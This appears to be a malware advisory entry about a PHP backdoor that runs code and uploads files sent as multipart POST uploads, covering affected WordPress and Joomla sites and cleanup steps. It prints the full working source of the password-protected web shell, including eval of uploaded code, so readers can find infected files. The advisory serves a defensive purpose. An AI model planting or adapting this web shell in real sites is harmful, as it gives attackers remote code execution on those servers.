This malware uses HTTP_POST_FILES variable to pass both files to upload (works as an uploader) and code to execute (works as a backdoor). It is more complex that a typical backdoor that uses POST request to pass malware. It needs to use Content-Type: multipart/form-data; and properly format the POST data simulating the normal file upload form data, e.g. Content-Disposition: form-data; name=f; filename=f.txt. The only difference is instead of saving the uploaded file to server, this backdoor can directly execute the PHP code in the uploaded file without saving it.
Affecting
Most PHP sites. We observerved a few attacks that specifically targeted WordPress and Joomla sites. The backdoor files usually had names of legitimate files with short prefixes such as "fix" or "co"
Cleanup
Cleanup is done by deleting the malicious file, which can be found in your system by searching for the dump code below inside your files. Reviewing access logs for non-expected HTTP POSTs can point out the possible infected files.
Dump
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;
define('PASSWD','249bae67d49ba2cd9cccca81ac3839cb');
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("mark_$t"));
};
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
$HTTP_POST_FILES["s"]["size"])) {
if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
{
testdata('save_ok');
};
//eval($code);
} else {
testdata('save_fail');
};
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
$HTTP_POST_FILES["f"]["size"]))
{
eval($code);
testdata('ok');
} else {
testdata('fail');
};
} else {
testdata('pass');
};
testdata('end');
echo "</pre>";